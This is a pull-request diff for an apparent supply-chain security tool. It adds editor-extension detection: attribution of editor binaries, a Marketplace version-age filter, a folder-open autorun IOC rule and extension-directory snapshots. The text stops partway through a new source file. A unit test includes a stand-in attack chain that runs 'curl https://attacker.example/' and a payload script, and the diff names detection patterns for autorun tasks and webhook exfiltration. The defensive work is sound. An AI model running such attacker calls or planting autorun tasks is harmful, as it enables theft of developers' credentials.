### PR TITLE
Editor-extension supply-chain coverage (Roadmap #19–#24)

### DIFF
--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -1049,21 +1049,30 @@ and lights up the most existing detection for free.
     to internal extension mirrors and forbid the public hosts.
 
 21. **`.vsix` / `.crx` lifecycle gate.**
-    Parallel to the npm tarball strip (#15). `.vsix` is a zip
-    with `extension/package.json`; inspect at proxy time:
-    - **audit/block**: flag `activationEvents: ["*"]` and
-      `onStartupFinished` (run-on-editor-start — the highest-
-      blast-radius primitive).
-    - **block-only signals**: `main` references to `child_process`
-      / `node:vm` / `eval` via cheap string grep on the bundled
-      JS, presence of obfuscated payloads (high-entropy string
-      blobs).
-    - **strip mode**: rewrite `activationEvents` from `["*"]` to
-      `[]` (force lazy activation) and zero out
-      `onStartupFinished`. Re-emit the zip + recompute the
-      Marketplace integrity hash the same way npm strip does.
-    `.crx` is signed end-to-end so strip is impossible — audit/
-    block only.
+    ✅ inspector library landed as `sakimori-proxy::vsix_inspect`.
+    `inspect_vsix(body)` opens the OPC zip, pulls
+    `extension/package.json`, and returns
+    `VsixInspection { name, publisher, version, activation_events,
+    main, fires_on_startup }`. The `fires_on_startup` bool flags
+    the two startup-autorun shapes (`"*"` wildcard and
+    `onStartupFinished`) — the highest-blast-radius VSCode
+    activation primitives, and the ones recent supply-chain
+    droppers favour. Hard ceilings (`MAX_VSIX_BYTES = 100 MiB`,
+    `MAX_PACKAGE_JSON_BYTES = 1 MiB`) keep a malicious zip from
+    stalling the proxy. Fail-open shape mirrors the npm
+    inspector: corrupt zip / missing manifest / unparseable JSON
+    return the default Inspection, defence does not fabricate
+    denials on malformed-but-legitimate artefacts.
+
+    Still pending: proxy integration (recognise the
+    `.../vsextensions/<pub>/<ext>/<ver>/vspackage` URL shape in
+    `classify_response`, dispatch `LifecyclePolicy::{Audit,Block}`
+    on the inspected result), strip mode (rewrite
+    `activationEvents` + recompute the Marketplace integrity
+    hash), and `.crx` audit. `main` JS body scanning belongs
+    naturally in `iocs::ContentNeedle` rather than here. `.crx`
+    is signed end-to-end so strip is impossible by design;
+    audit/block only.
 
 22. **Extension installs in the `InstallEvent` inventory.**
     Extend the `Ecosystem` enum (Roadmap #6) with

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -1097,15 +1097,35 @@ and lights up the most existing detection for free.
     private extensions all the time, can't ship as a hard rule).
 
 24. **Editor extension directory tamper detection.**
-    `sakimori workspace snapshot --include-editor-extensions`
-    extends the snapshot walker to also hash
-    `~/.vscode/extensions/`, `~/.cursor/extensions/`, and
-    `~/Library/Application Support/Code/User/globalStorage/`
-    (Linux/Windows equivalents wired similarly). Diff at run
-    end the same way workspace drift does today. Catches
-    sideloaded extensions that bypass the Marketplace fetch.
-    Pairs naturally with `file.deny` on those paths so the eBPF
-    tripwire fires on the write itself.
+    ✅ library surface implemented as
+    `sakimori-core::editor_extensions`:
+    `default_roots($HOME)` auto-detects `~/.vscode/extensions/`,
+    `~/.vscode-insiders/extensions/`, `~/.cursor/extensions/`,
+    `~/.windsurf/extensions/`, and the platform-appropriate
+    VS Code `User/globalStorage/` (Linux:
+    `$XDG_CONFIG_HOME/Code/User/globalStorage`, macOS:
+    `~/Library/Application Support/Code/User/globalStorage`,
+    Windows: `%APPDATA%\Code\User\globalStorage`). Only roots that
+    exist on disk at call time are returned, so a user without
+    Cursor doesn't see an empty namespace polluting their diff.
+    `snapshot_roots(&roots, &opts)` walks each root with the
+    existing `tamper::Snapshot` machinery and merges into one
+    diffable artefact, prefixing every path with the root's label
+    (`vscode-extensions/foo.bar-1.0.0/package.json`) so the same
+    extension id under two editors doesn't collide.
+
+    Reuses the existing `tamper::diff` so all downstream
+    consumers — `workspace diff`, the JSON log, the HTML report,
+    the IOC scanner — work unchanged on the merged snapshot.
+
+    Still pending: CLI wiring (`sakimori workspace snapshot
+    --include-editor-extensions` / a dedicated
+    `sakimori extensions snapshot` subcommand) and integration
+    into `sakimori run` / `daemon` so the snapshot is taken
+    automatically. Pairs naturally with `file.deny` on the same
+    paths once exposed via policy presets — the eBPF tripwire
+    fires on the write itself while the post-run diff catches
+    sideloads that bypass the Marketplace fetch.
 
 Explicitly **out of scope** (different product philosophy, not
 a missing feature):

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -984,6 +984,107 @@ of value-per-implementation-cost.
     (dropper-signature bytes, base64-encoded private-key headers)
     as reproducible samples surface.
 
+### Editor-extension coverage (VSCode / Cursor / Chrome)
+
+The 2026-05 GitHub-internal-repo compromise (poisoned VS Code
+extension on an employee device) made it explicit: editor and
+browser extensions are a parallel distribution channel sakimori
+doesn't currently cover. The fetch path is HTTPS, the install
+artefact has a structured manifest, and the runtime parent is a
+known editor binary — all three properties the existing proxy +
+attribution + IOC catalog were designed for. Roadmap entries
+below are listed in implementation order; #19 is the cheapest
+and lights up the most existing detection for free.
+
+19. **Attribution: recognise editor binaries as a tool root.**
+    The v0.23 attribution layer walks PPid up from each event
+    until it finds a known `argv[0]` (npm, cargo, pip, …) and
+    stamps `source: <pm>` on the event. Add `code`,
+    `code-server`, `cursor`, `windsurf`, `code-helper`
+    (electron renderer/plugin host basename on macOS) to the
+    recognised set. The moment those are in,
+    `cloud_secrets::scan` (#17), the persistence-write rule pack
+    (#16), and the IOC scanner (#18) all attribute extension-
+    spawned syscalls back to the editor — i.e. "VSCode extension
+    just opened `~/.ssh/id_ed25519`" surfaces in the existing
+    JSON log + step summary + HTML report with no further
+    changes. Smallest possible diff, largest immediate value.
+    Naming caveat: the enum is currently `PackageManager`; an
+    editor isn't strictly that, but the field is semantically
+    "attribution root". Future rename optional, not required for
+    this slice.
+
+20. **Marketplace as a proxy ecosystem (release-age + IOC pin).**
+    Treat `marketplace.visualstudio.com`, `open-vsx.org`, and the
+    Chrome Web Store update endpoint (`clients2.google.com/
+    service/update2/crx`) as new ecosystems in `RegistryHosts`.
+    - VSCode Marketplace `extensionquery` returns JSON with
+      `versions[].lastUpdated` per entry — apply the same
+      min-release-age filter the npm packument rewriter uses.
+    - OpenVSX has the identical shape (it's an API-compatible
+      mirror).
+    - Chrome Web Store update XML carries no publish timestamp
+      inline; needs an out-of-band lookup to the web-store detail
+      page or the unofficial JSON endpoint, cached per-extension
+      like the NuGet flat-container resolver. Fail-open with a
+      warn log if the lookup fails.
+
+    Pairs with the SNI allow-list (#8) so corp installs can lock
+    to internal extension mirrors and forbid the public hosts.
+
+21. **`.vsix` / `.crx` lifecycle gate.**
+    Parallel to the npm tarball strip (#15). `.vsix` is a zip
+    with `extension/package.json`; inspect at proxy time:
+    - **audit/block**: flag `activationEvents: ["*"]` and
+      `onStartupFinished` (run-on-editor-start — the highest-
+      blast-radius primitive).
+    - **block-only signals**: `main` references to `child_process`
+      / `node:vm` / `eval` via cheap string grep on the bundled
+      JS, presence of obfuscated payloads (high-entropy string
+      blobs).
+    - **strip mode**: rewrite `activationEvents` from `["*"]` to
+      `[]` (force lazy activation) and zero out
+      `onStartupFinished`. Re-emit the zip + recompute the
+      Marketplace integrity hash the same way npm strip does.
+    `.crx` is signed end-to-end so strip is impossible — audit/
+    block only.
+
+22. **Extension installs in the `InstallEvent` inventory.**
+    Extend the `Ecosystem` enum (Roadmap #6) with
+    `VscodeExtension` / `ChromeExtension`. The proxy logger
+    already runs on every allowed install path; once #20 lands,
+    the Marketplace fetch matches an ecosystem and gets appended
+    to `~/.sakimori/installs.jsonl` and (if configured) dispatched
+    via `/ingest` and OTLP. `sakimori advisories scan` then
+    queries OSV/GHSA for advisories against extension IDs and
+    surfaces past installs — the same retroactive-CVE story
+    Dependabot/Snyk fundamentally can't tell because they're
+    repo-lockfile-bound.
+
+23. **Workspace `.vscode/` / `.cursor/` as known-IOC surface.**
+    Extend the IOC catalog (#18) with three rules:
+    - `Basename(".vscode/tasks.json")` content-needle for
+      `"runOn": "folderOpen"` — folder-open auto-execution.
+    - `Basename(".vscode/settings.json")` content-needle for
+      `terminal.integrated.profiles.*.args` containing
+      shell-redirected commands.
+    - `Basename(".vscode/extensions.json")` content-needle for
+      unpinned publisher.extension recommendations from
+      non-canonical publishers (heuristic).
+    Same severity weighting as the existing `.claude/setup.mjs`
+    High rule — workspace-scoped autorun primitives.
+
+24. **Editor extension directory tamper detection.**
+    `sakimori workspace snapshot --include-editor-extensions`
+    extends the snapshot walker to also hash
+    `~/.vscode/extensions/`, `~/.cursor/extensions/`, and
+    `~/Library/Application Support/Code/User/globalStorage/`
+    (Linux/Windows equivalents wired similarly). Diff at run
+    end the same way workspace drift does today. Catches
+    sideloaded extensions that bypass the Marketplace fetch.
+    Pairs naturally with `file.deny` on those paths so the eBPF
+    tripwire fires on the write itself.
+
 Explicitly **out of scope** (different product philosophy, not
 a missing feature):
 

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -1078,17 +1078,23 @@ and lights up the most existing detection for free.
     repo-lockfile-bound.
 
 23. **Workspace `.vscode/` / `.cursor/` as known-IOC surface.**
-    Extend the IOC catalog (#18) with three rules:
-    - `Basename(".vscode/tasks.json")` content-needle for
-      `"runOn": "folderOpen"` — folder-open auto-execution.
-    - `Basename(".vscode/settings.json")` content-needle for
-      `terminal.integrated.profiles.*.args` containing
-      shell-redirected commands.
-    - `Basename(".vscode/extensions.json")` content-needle for
-      unpinned publisher.extension recommendations from
-      non-canonical publishers (heuristic).
-    Same severity weighting as the existing `.claude/setup.mjs`
-    High rule — workspace-scoped autorun primitives.
+    ✅ first rule landed in catalog v2026.05.21:
+    `vscode.tasks-folderopen-autorun` is a `ContentNeedle`
+    constrained to basename `tasks.json` matching the literal
+    `"runOn": "folderOpen"` key/value. That's the canonical VSCode
+    primitive for "execute on workspace open" — a clean repo
+    essentially never ships it, and the value-string is specific
+    enough that the basename filter alone keeps false positives
+    near zero. Severity High, family `editor-extension`. Cursor's
+    `.cursor/tasks.json` rides the same rule (basename match is
+    parent-directory-agnostic).
+
+    Still pending: settings.json `terminal.integrated.profiles.*.args`
+    needing shell-redirected commands (substring matching alone
+    yields too many false positives; needs structural parsing —
+    follow-up), and `extensions.json` recommendations from
+    non-canonical publishers (heuristic; legitimate teams pin
+    private extensions all the time, can't ship as a hard rule).
 
 24. **Editor extension directory tamper detection.**
     `sakimori workspace snapshot --include-editor-extensions`

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -1018,16 +1018,32 @@ and lights up the most existing detection for free.
     Treat `marketplace.visualstudio.com`, `open-vsx.org`, and the
     Chrome Web Store update endpoint (`clients2.google.com/
     service/update2/crx`) as new ecosystems in `RegistryHosts`.
-    - VSCode Marketplace `extensionquery` returns JSON with
-      `versions[].lastUpdated` per entry — apply the same
-      min-release-age filter the npm packument rewriter uses.
-    - OpenVSX has the identical shape (it's an API-compatible
-      mirror).
+    - **VSCode Marketplace + OpenVSX**: ✅ first slice implemented
+      as `crate::rewrite_vscode::rewrite_extensionquery_json`.
+      `RegistryHosts` gains a `vscode_marketplace` list defaulting
+      to both canonical hosts; the proxy recognises the
+      `POST /_apis/public/gallery/extensionquery` (MS) and
+      `POST /vscode/gallery/extensionquery` (OpenVSX compat shim)
+      endpoints in `classify_response` and routes the JSON
+      response to the rewriter. Filtering walks every
+      `results[].extensions[].versions[]` array and drops entries
+      whose `lastUpdated` is younger than `--min-age` — same
+      silent-fallback model the npm packument rewriter uses. If
+      every version of an extension is dropped, the rewriter
+      leaves the `extensions[]` entry in place with an empty
+      `versions: []` so the editor surfaces a clean "no
+      installable version" error instead of silently dropping the
+      extension (which would mask legitimate missing-on-mirror
+      cases). Missing / unparseable `lastUpdated` fails open per
+      `serde_json` policy; the tarball-pin lifecycle gate (#21) is
+      the backstop. `--vscode-marketplace-registry <HOST>`
+      (repeatable) teaches the proxy about corp-internal galleries
+      that speak the same envelope.
     - Chrome Web Store update XML carries no publish timestamp
       inline; needs an out-of-band lookup to the web-store detail
       page or the unofficial JSON endpoint, cached per-extension
       like the NuGet flat-container resolver. Fail-open with a
-      warn log if the lookup fails.
+      warn log if the lookup fails. **Not yet implemented.**
 
     Pairs with the SNI allow-list (#8) so corp installs can lock
     to internal extension mirrors and forbid the public hosts.

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -1118,14 +1118,24 @@ and lights up the most existing detection for free.
     consumers — `workspace diff`, the JSON log, the HTML report,
     the IOC scanner — work unchanged on the merged snapshot.
 
-    Still pending: CLI wiring (`sakimori workspace snapshot
-    --include-editor-extensions` / a dedicated
-    `sakimori extensions snapshot` subcommand) and integration
-    into `sakimori run` / `daemon` so the snapshot is taken
-    automatically. Pairs naturally with `file.deny` on the same
-    paths once exposed via policy presets — the eBPF tripwire
-    fires on the write itself while the post-run diff catches
-    sideloads that bypass the Marketplace fetch.
+    ✅ CLI wired as `sakimori extensions snapshot` /
+    `sakimori extensions diff`. Snapshot emits a merged JSON to
+    stdout (or `--output FILE`); diff reads a baseline, walks the
+    discovered roots, and reports added/modified/removed entries
+    plus a per-root IOC scan that re-uses the v2026.05.21 catalog
+    (so `vscode.tasks-folderopen-autorun` fires on a poisoned
+    sideload's `tasks.json`, and the existing Shai-Hulud / exfil
+    needles fire on any extension code that ships them). High-
+    severity IOC hits force exit 1 unconditionally; structural
+    drift exits 1 unless `--allow-drift`. `--home <DIR>` is the
+    test/CI escape hatch.
+
+    Still pending: integration into `sakimori run` / `daemon` so
+    the snapshot is taken automatically around supervised steps.
+    Pairs naturally with `file.deny` on the same paths once
+    exposed via policy presets — the eBPF tripwire fires on the
+    write itself while the post-run diff catches sideloads that
+    bypass the Marketplace fetch.
 
 Explicitly **out of scope** (different product philosophy, not
 a missing feature):

--- a/Cargo.lock
+++ b/Cargo.lock
@@ -89,6 +89,15 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "7f202df86484c868dbad7eaa557ef785d5c66295e41b460ef922eca0723b842c"
 
 [[package]]
+name = "arbitrary"
+version = "1.4.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c3d036a3c4ab069c7b410a2ce876bd74808d2d0888a82667669f8e783a898bf1"
+dependencies = [
+ "derive_arbitrary",
+]
+
+[[package]]
 name = "asn1-rs"
 version = "0.6.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -529,6 +538,17 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "7cd812cc2bc1d69d4764bd80df88b4317eaef9e773c75226407d9bc0876b211c"
 dependencies = [
  "powerfmt",
+]
+
+[[package]]
+name = "derive_arbitrary"
+version = "1.4.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1e567bd82dcff979e4b03460c307b3cdc9e96fde3d73bed1496d2bc75d9dd62a"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn",
 ]
 
 [[package]]
@@ -2109,6 +2129,7 @@ dependencies = [
  "toml",
  "ureq",
  "webpki-roots 0.26.11",
+ "zip",
 ]
 
 [[package]]
@@ -3395,7 +3416,36 @@ dependencies = [
 ]
 
 [[package]]
+name = "zip"
+version = "2.4.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "fabe6324e908f85a1c52063ce7aa26b68dcb7eb6dbc83a2d148403c9bc3eba50"
+dependencies = [
+ "arbitrary",
+ "crc32fast",
+ "crossbeam-utils",
+ "displaydoc",
+ "flate2",
+ "indexmap",
+ "memchr",
+ "thiserror 2.0.18",
+ "zopfli",
+]
+
+[[package]]
 name = "zmij"
 version = "1.0.21"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "b8848ee67ecc8aedbaf3e4122217aff892639231befc6a1b58d29fff4c2cabaa"
+
+[[package]]
+name = "zopfli"
+version = "0.8.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f05cd8797d63865425ff89b5c4a48804f35ba0ce8d125800027ad6017d2b5249"
+dependencies = [
+ "bumpalo",
+ "crc32fast",
+ "log",
+ "simd-adler32",
+]

--- a/README.md
+++ b/README.md
@@ -90,8 +90,9 @@ from then on, every HTTPS request your package managers make through
 | **npm** | ✅ packument rewrite (drops versions + retargets `dist-tags.latest`) | ✅ `403` on `.tgz` download |
 | **pypi** | ✅ Warehouse JSON API (`/pypi/<pkg>/json`) + PEP 691 Simple JSON + PEP 503 Simple HTML via JSON-API lookup | ✅ `403` on `files.pythonhosted.org` tarball download |
 | **nuget** | ✅ registration-page rewrite (`/v3/registration*/...`) + flat-container index via registration lookup | ✅ `403` on `.nupkg` download |
+| **vscode-marketplace** | ✅ `extensionquery` JSON rewrite (drops `versions[].lastUpdated` younger than `--min-age`) on `marketplace.visualstudio.com` + `open-vsx.org` | ⏳ `.vsix` lifecycle gate planned ([roadmap #21](CLAUDE.md)) |
 
-All four ecosystems' metadata paths now rewrite silently — pnpm-style
+All five ecosystems' metadata paths now rewrite silently — pnpm-style
 `minimumReleaseAge` across the board, no fail-hard in the common case.
 
 ### OS support matrix
@@ -129,6 +130,98 @@ exercises proxy start → pinned-tarball fetch → `installs.jsonl` →
 `advisories scan` → `install-gate shellenv` end-to-end on every PR
 that touches the relevant crates, so the cells marked ✅ for macOS
 above don't silently regress.
+
+### Editor-extension coverage (VSCode / Cursor / Windsurf / OpenVSX)
+
+The 2026-05 GitHub-internal-repo compromise (poisoned VS Code
+extension on an employee device) made it concrete: editor and
+browser extensions are a parallel distribution channel that almost
+nothing on the supply-chain market actually catches end-to-end.
+sakimori covers it across four layers, each addressing a failure
+mode the others can't:
+
+| layer | what catches | where in sakimori |
+|---|---|---|
+| **Fetch (proxy)** | Marketplace install of a young / freshly-published extension | `extensionquery` JSON rewriter on `marketplace.visualstudio.com` + `open-vsx.org` — silent `minimumReleaseAge`-style fallback per ecosystem #20 |
+| **Runtime attribution** | Extension subtree opens `~/.ssh/id_ed25519` / hits IMDS / executes a downloaded payload | PPid walker recognises `code` / `cursor` / `windsurf` / `code-server` / `Code Helper (Plugin)` and stamps `source: vscode` on every Connect / Open / Exec event the extension subtree produces — persistence-write, cloud-secret-egress, IOC scanner all fire #19 |
+| **Workspace poisoning** | A repo with `.vscode/tasks.json` auto-running on `folderOpen` | IOC catalog v2026.05.21+ ships `vscode.tasks-folderopen-autorun` as a basename-scoped content needle (High severity, family `editor-extension`) #23 |
+| **Sideload tamper** | An extension installed bypassing the Marketplace fetch (e.g. dragged-in `.vsix`, manual `git clone` into `~/.vscode/extensions/`) | `sakimori extensions snapshot` / `extensions diff` auto-discovers `~/.vscode`, `~/.vscode-insiders`, `~/.cursor`, `~/.windsurf`, plus the platform `globalStorage` tree; the diff runs the IOC catalog against every added / modified path #24 |
+
+#### Why this is different from "be a marketplace mirror"
+
+A few existing tools in this space try to be a **registry mirror**
+for the VS Code Marketplace — they stand up a server, scrape
+Microsoft's gallery, and ask users to repoint VS Code at the
+mirror via `product.json` edits or `extensions.gallery.serviceUrl`
+overrides. That approach has real friction:
+
+1. **VS Code has no first-class "alternate registry" config.** The
+   marketplace URL is hardcoded in `product.json`; switching it
+   requires modifying Microsoft's binary, which the EULA forbids
+   redistributing. (VSCodium, Cursor, Code-OSS, Windsurf — forks —
+   *do* expose a configurable gallery setting; the EULA issue is
+   specific to upstream VS Code.)
+2. **Marketplace ToS treats redistribution carefully.** §3 of the
+   VS Code Marketplace terms allows access to the gallery for
+   downloading extensions; standing up an independent mirror that
+   *re-serves* the gallery to other users sits in genuinely murky
+   territory. Several mirror-style projects have hit takedown notices
+   or quietly become enterprise-only because of this.
+
+**sakimori takes a different shape — an endpoint MITM proxy, not a
+mirror.** That sidesteps both problems:
+
+- **No editor binary modification.** The user sets
+  `HTTPS_PROXY=http://127.0.0.1:8080` (via `sakimori install-gate
+  install`, the same one-liner `npm install` already uses) and
+  trusts sakimori's local CA. The marketplace request the editor
+  makes is unchanged; only the *response* the editor receives is
+  filtered to drop too-young versions. `product.json` stays
+  byte-for-byte identical to whatever Microsoft shipped.
+- **No re-serving.** sakimori never stands up an authoritative
+  gallery. It MITMs the user's *own* request to Microsoft (or
+  Eclipse for OpenVSX), filters the JSON in transit, and hands
+  it back. The bytes leave sakimori the moment the editor reads
+  them; no per-tenant caching or republication. Architecturally
+  this is the same posture Bitdefender, Kaspersky, Cisco
+  Umbrella, and corporate SSL-inspection appliances have run for
+  a decade — well-understood, both legally and operationally.
+- **Same proxy, every editor.** One running instance covers VS
+  Code, Cursor, VSCodium, Code-OSS, code-server, and any other
+  editor that speaks the Marketplace / OpenVSX `extensionquery`
+  API. No per-editor configuration knob.
+
+#### Defence in depth, not just the proxy
+
+The proxy alone doesn't solve the problem — a determined attacker
+ships an extension *with* a deliberate publication delay so it
+clears `--min-age`, or sideloads via `.vsix` to bypass the proxy
+entirely. That's why the four-layer table above matters:
+
+- A sideloaded extension never hits the proxy → `extensions diff`
+  still catches it (new files under `~/.vscode/extensions/`).
+- An aged-into-marketplace extension passes the rewriter →
+  attribution + persistence-write rule pack catches the actual
+  malicious behaviour (writing to `~/.ssh/`, hitting IMDS, etc.)
+  at runtime.
+- A workspace `.vscode/tasks.json` autorun never touches the
+  marketplace at all → the IOC catalog catches the dropper
+  primitive directly.
+
+Registry-firewall tools (Sonatype Nexus Firewall, JFrog Xray) sit
+at the right layer for #1 but only for the proxy path. EDR /
+SCA tools cover none of the four directly. sakimori is the only
+endpoint agent we're aware of that covers all four with a
+shared attribution + IOC backbone.
+
+#### Roadmap items pending in this area
+
+`.vsix` / `.crx` lifecycle gate (block on `activationEvents:
+["*"]`-style autorun primitives at fetch time), `Ecosystem::
+VscodeExtension` propagation into the install log and OSV-JOIN
+advisory scan, and Chrome Web Store coverage are all tracked in
+[CLAUDE.md](CLAUDE.md) roadmap entries #20–#24. Pull requests
+welcome.
 
 ---
 
@@ -683,6 +776,46 @@ different contents will read as unchanged — bump
 
 `--format json` for machine-readable output. `--allow-drift`
 suppresses the non-zero exit when you only want the report.
+
+### `extensions snapshot` / `extensions diff`
+
+The editor-extension counterpart of `workspace snapshot`. Auto-
+discovers every editor extension root that exists on the host —
+`~/.vscode/extensions/`, `~/.vscode-insiders/extensions/`,
+`~/.cursor/extensions/`, `~/.windsurf/extensions/`, plus the
+platform-appropriate VS Code `User/globalStorage/` — and produces
+one merged snapshot. Each file's relative path is prefixed with
+the root's label (`vscode-extensions/foo.bar-1.0.0/package.json`)
+so the same extension id installed under two editors doesn't
+collide.
+
+```bash
+# Take a baseline (run when you trust the current state)
+sakimori extensions snapshot -o ~/.sakimori/extensions-baseline.json
+
+# Some time later — perhaps after `git pull`, perhaps daily via cron
+sakimori extensions diff ~/.sakimori/extensions-baseline.json
+```
+
+The diff reports added / modified / removed entries and runs the
+known-IOC catalog against every implicated path: a sideloaded
+`.vsix` whose `package.json` references `discord.com/api/
+webhooks/`, or a workspace's `.vscode/tasks.json` configured to
+auto-run on `folderOpen`, surfaces as both a structural drift
+entry and a High-severity IOC hit. High-severity IOC hits force
+exit 1 unconditionally; structural drift exits 1 unless
+`--allow-drift`.
+
+A user without Cursor installed sees no `cursor-extensions/`
+entries — the walker filters to roots that actually exist at
+call time. `--home <DIR>` overrides `$HOME` for tests / CI.
+
+This is the **sideload backstop**: even if an attacker bypasses
+the marketplace fetch entirely (drag-and-drop `.vsix`, `git
+clone` directly into the extensions dir, vendored install), the
+diff catches the new files. Pair with the proxy's
+`extensionquery` rewriter for the fetch path and you cover both
+the marketplace-bound and out-of-band install routes.
 
 ### `actions audit`
 

--- a/crates/sakimori-core/src/attribution.rs
+++ b/crates/sakimori-core/src/attribution.rs
@@ -32,8 +32,17 @@ use serde::{Deserialize, Serialize};
 /// `/proc` reads can't stall the drain task.
 pub const MAX_CHAIN_DEPTH: usize = 32;
 
+/// Recognised attribution roots: the high-level tool whose subtree
+/// produced the event. Historically these were strictly package
+/// managers (npm, cargo, …); v0.38 added editor binaries (`code`,
+/// `cursor`, …) so extension-spawned syscalls attribute back to the
+/// editor process and downstream rules (persistence-write,
+/// cloud-secret-egress, IOC scanner) light up against extension
+/// activity for free. The type name is a legacy of the original
+/// scope — the field is semantically "attribution root", not
+/// strictly a package manager.
 #[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
-#[serde(rename_all = "lowercase")]
+#[serde(rename_all = "kebab-case")]
 pub enum PackageManager {
     Npm,
     Pnpm,
@@ -48,6 +57,21 @@ pub enum PackageManager {
     Gradle,
     Bundler,
     Composer,
+    /// VS Code (Microsoft build), Code - OSS, VSCodium — same
+    /// `code` argv[0] basename. Includes extension host children.
+    VscodeEditor,
+    /// `code-server` — Coder's browser-served VS Code.
+    CodeServer,
+    /// Anysphere's Cursor editor.
+    Cursor,
+    /// Codeium's Windsurf editor.
+    Windsurf,
+    /// Electron renderer / extension-host helper. On macOS the
+    /// VS Code extension host process exec's as
+    /// `Code Helper (Plugin)` — basename `Code Helper`. On Linux
+    /// it shows up as `code` again, so this variant is primarily
+    /// the macOS path.
+    CodeHelper,
 }
 
 impl PackageManager {
@@ -75,6 +99,17 @@ impl PackageManager {
             "gradle" => Self::Gradle,
             "bundle" | "bundler" => Self::Bundler,
             "composer" => Self::Composer,
+            "code" => Self::VscodeEditor,
+            "code-server" => Self::CodeServer,
+            "cursor" => Self::Cursor,
+            "windsurf" => Self::Windsurf,
+            // Match the macOS extension-host basename. The
+            // trim_version_suffix pass leaves embedded spaces and
+            // parentheses untouched, so both
+            // "Code Helper" and "Code Helper (Plugin)" reach us
+            // here; check by prefix to cover the (Renderer) /
+            // (GPU) / (Plugin) variants uniformly.
+            s if s.starts_with("Code Helper") => Self::CodeHelper,
             _ => return None,
         };
         Some(pm)
@@ -95,6 +130,11 @@ impl PackageManager {
             Self::Gradle => "gradle",
             Self::Bundler => "bundler",
             Self::Composer => "composer",
+            Self::VscodeEditor => "vscode",
+            Self::CodeServer => "code-server",
+            Self::Cursor => "cursor",
+            Self::Windsurf => "windsurf",
+            Self::CodeHelper => "vscode-extension-host",
         }
     }
 }
@@ -460,6 +500,67 @@ mod tests {
         assert_eq!(trim_version_suffix("npm"), "npm");
         // All-digit name — leave alone (we'd otherwise return "")
         assert_eq!(trim_version_suffix("123"), "123");
+    }
+
+    #[test]
+    fn from_argv0_recognises_editor_binaries() {
+        assert_eq!(
+            PackageManager::from_argv0("code"),
+            Some(PackageManager::VscodeEditor)
+        );
+        assert_eq!(
+            PackageManager::from_argv0("/usr/share/code/code"),
+            Some(PackageManager::VscodeEditor)
+        );
+        assert_eq!(
+            PackageManager::from_argv0("code-server"),
+            Some(PackageManager::CodeServer)
+        );
+        assert_eq!(
+            PackageManager::from_argv0("cursor"),
+            Some(PackageManager::Cursor)
+        );
+        assert_eq!(
+            PackageManager::from_argv0("windsurf"),
+            Some(PackageManager::Windsurf)
+        );
+        assert_eq!(
+            PackageManager::from_argv0("Code Helper"),
+            Some(PackageManager::CodeHelper)
+        );
+        assert_eq!(
+            PackageManager::from_argv0("Code Helper (Plugin)"),
+            Some(PackageManager::CodeHelper)
+        );
+        assert_eq!(
+            PackageManager::from_argv0("Code Helper (Renderer)"),
+            Some(PackageManager::CodeHelper)
+        );
+    }
+
+    #[test]
+    fn attribute_walks_chain_from_extension_host_to_vscode() {
+        // pid 500 (curl invoked by malicious extension) ← 499
+        // (node extension-host child) ← 498 (Code Helper Plugin)
+        // ← 497 (code). The first attribution root we hit walking
+        // up is Code Helper, so that's what the event is stamped
+        // with — exactly the "this came from an extension" signal
+        // persistence-write / cloud-secrets / IOC rules gate on.
+        let mut f = FakeLookup::default();
+        f.add(500, Some(499), "curl", "curl https://attacker.example/");
+        f.add(499, Some(498), "node", "node /tmp/ext-payload.js");
+        f.add(
+            498,
+            Some(497),
+            "Code Helper (Plugin)",
+            "Code Helper (Plugin)",
+        );
+        f.add(497, Some(1), "code", "/usr/share/code/code");
+        f.add(1, None, "init", "/sbin/init");
+
+        let a = attribute(500, &f, &[]).expect("event pid is readable");
+        assert_eq!(a.package_manager, Some(PackageManager::CodeHelper));
+        assert_eq!(a.root_argv.as_deref(), Some("Code Helper (Plugin)"));
     }
 
     #[cfg(target_os = "linux")]

--- a/crates/sakimori-core/src/editor_extensions.rs
+++ b/crates/sakimori-core/src/editor_extensions.rs
@@ -1,0 +1,264 @@
+//! Editor-extension directory tamper detection — the workspace-
+//! snapshot counterpart for `~/.vscode/extensions/` and friends.
+//!
+//! Why a separate module: [`crate::tamper`] is workspace-rooted (one
+//! root path → one snapshot). An "editor extension audit" naturally
+//! spans several disjoint roots — the user's VS Code, Cursor, and
+//! Windsurf extension directories, plus per-editor `User/
+//! globalStorage/` trees — and we want them in one diffable
+//! artefact so a sideloaded extension shows up regardless of which
+//! editor it landed in. We rebuild a [`tamper::Snapshot`] from the
+//! merged walk so all the existing diff / IOC-scan / JSON-log
+//! infrastructure works unchanged downstream.
+//!
+//! Detection-only by design, exactly like [`crate::tamper`]: this
+//! flags drift, it doesn't roll back. Pairs naturally with the
+//! `file.deny` eBPF tripwire on the same paths (Roadmap entry #24)
+//! so a runtime write into a snapshotted root is visible from both
+//! the post-run diff and the live audit log.
+
+use std::{
+    collections::BTreeMap,
+    path::{Path, PathBuf},
+};
+
+use anyhow::Result;
+
+use crate::tamper::{Options, Snapshot};
+
+/// One known editor-extension root we walk. The `label` is what gets
+/// prefixed onto each file's relative path in the merged snapshot so
+/// two editors that ship the same extension id don't collide
+/// (`vscode/extensions/foo.bar-1.0.0/package.json` vs
+/// `cursor/extensions/foo.bar-1.0.0/package.json`).
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub struct EditorRoot {
+    pub label: String,
+    pub path: PathBuf,
+}
+
+/// Discover the editor extension roots that exist on the current
+/// host. Returns only roots whose path is a directory at call time —
+/// a user who doesn't have Cursor installed shouldn't see an empty
+/// `cursor/` namespace polluting their diff. The mapping is
